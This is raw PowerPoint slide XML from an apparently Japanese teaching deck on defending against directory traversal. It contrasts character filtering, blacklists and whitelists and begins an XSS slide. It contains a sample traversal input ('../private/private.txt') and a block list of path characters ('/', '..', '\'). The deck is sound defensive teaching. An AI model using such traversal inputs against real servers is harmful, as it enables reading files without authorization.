              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>」が含まれるため遮断</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="図 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90297EBC-1D49-A19B-8168-0F21411DF7E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1775809" y="3429000"/>
            <a:ext cx="8640381" cy="2524477"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="テキスト ボックス 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{999371E0-C464-0207-9DB5-2E47C2F3AECB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4908815" y="6088414"/>
            <a:ext cx="2374368" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>「</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>」と入力した場合</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31079703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39AB4-8D10-4856-61C8-2870F94E4BAF}"/>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9E90C25B-75E5-FBDB-4FA5-D86F7EFB2286}"/>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不正アクセス：ブラウザ画面</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>不正な文字列の検知</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>GET</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>で渡された文字列に「</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>..</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>」が含まれるため遮断</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="テキスト ボックス 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{999371E0-C464-0207-9DB5-2E47C2F3AECB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4908816" y="5942568"/>
            <a:ext cx="2380780" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>「</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>..</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>」と入力した場合</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="図 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C36ED9E6-AF51-48A1-4565-998393934F1D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1937757" y="3304172"/>
            <a:ext cx="8316486" cy="2705478"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6264519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D09C5B-308B-7EBE-096F-8661D793191B}"/>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A26DCFB8-F5D3-E7DC-4B1D-53D39870C94C}"/>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不正アクセス：ブラウザ画面</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>不正な文字列の検知</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>GET</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>で渡された文字列に「</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>」が含まれるため遮断</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="図 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1547E0DB-165D-4545-66F2-D7E0AAE9CE17}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2601796" y="3338769"/>
            <a:ext cx="6988407" cy="2468862"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="テキスト ボックス 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B7FCE50C-06EE-FDE6-4827-4EADF52AC411}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4869541" y="5807631"/>
            <a:ext cx="2452916" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>「</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>」と入力した場合</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19914497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2ACD40-FD11-2F60-7486-A6B0AC097C96}"/>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4DCE32CB-B5B1-2439-9575-BB3EC3F8FD48}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>ディレクトリトラバーサル対策</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>不正な文字列の検知</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>補足</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>この手法で多くの場合解決できるようになるが、一方で</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>に変換された場合で文字列が変わるなどで登録しておくべき不正な文字列は「</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>」と「</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>..</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>」と「</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>」だけではなくなるため</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>この対策方法は非推奨</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40512196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16975-3F5A-D770-0465-6788174FAFAA}"/>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EF3FFF97-784E-758E-9CEE-5CC7B31C9E72}"/>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保険的対策②</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>ブラックリスト方式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>セキュリティレベル最弱</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>アクセスできないフォルダやファイルを選定する</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>→選定された場所の場合アクセスできない</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>ホワイトリスト方式</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>セキュリティレベル弱</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>アクセスできるフォルダやファイルを選定する</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>→選定された場所以外の場合アクセスできない</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3627567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61E74B-1FF1-F958-B22C-4E8A053024D2}"/>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11E8C914-08AC-83C2-3603-CC31F8ACA2F6}"/>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サーバ</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>ブラックリスト方式</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="図 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1087324-6B25-2BBE-E5F0-86D30C818E92}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3401344" y="2782956"/>
            <a:ext cx="5389311" cy="3955774"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25033416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ECBFD4-43BE-C3A9-5270-BECF5D7A010E}"/>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261094FF-D741-685E-5F2E-2BA61941807A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>ディレクトリトラバーサル対策</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>正常アクセス：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>ブラウザ画面</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>ブラックリスト方式</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>「</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>public</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>」のフォルダにはもちろんアクセスできる。</a:t>
            </a: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8504F914-8A90-ED22-843A-E88B3A7BD33F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1354164" y="3317135"/>
            <a:ext cx="9356452" cy="2523600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="テキスト ボックス 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8912E0C-0DA9-4158-0810-E1CC8D1B6588}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5450339" y="5942568"/>
            <a:ext cx="1164101" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>ublic.txt</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8573603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9E28EA-8D26-1037-0404-63B8AD707CBE}"/>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4A766B19-303E-F7EB-3212-6C1988A9C341}"/>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不正アクセス：ブラウザ画面</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>ブラックリスト方式</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>「</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>private</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>」のフォルダはアクセスできないようにしているため</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>不正アクセスになる</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="図 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2831E929-8F71-06E7-BE1F-27AA781F47AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1861543" y="3804731"/>
            <a:ext cx="8468909" cy="1949029"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="テキスト ボックス 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1437FEBC-9CC3-3C51-C133-3D0E24B48FFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4935264" y="5888697"/>
            <a:ext cx="2321469" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>../private/private.txt</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2495951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BB546D-7A3F-1BC0-9896-9140EE6E53C1}"/>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6ABA5673-703A-C1A5-B8D5-E36D02CFB54B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>の仕組み</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>サーバ側</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="図 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{948A096D-A998-4DE2-8D23-397191ABFCE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2855755" y="2231428"/>
            <a:ext cx="6480490" cy="3945535"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
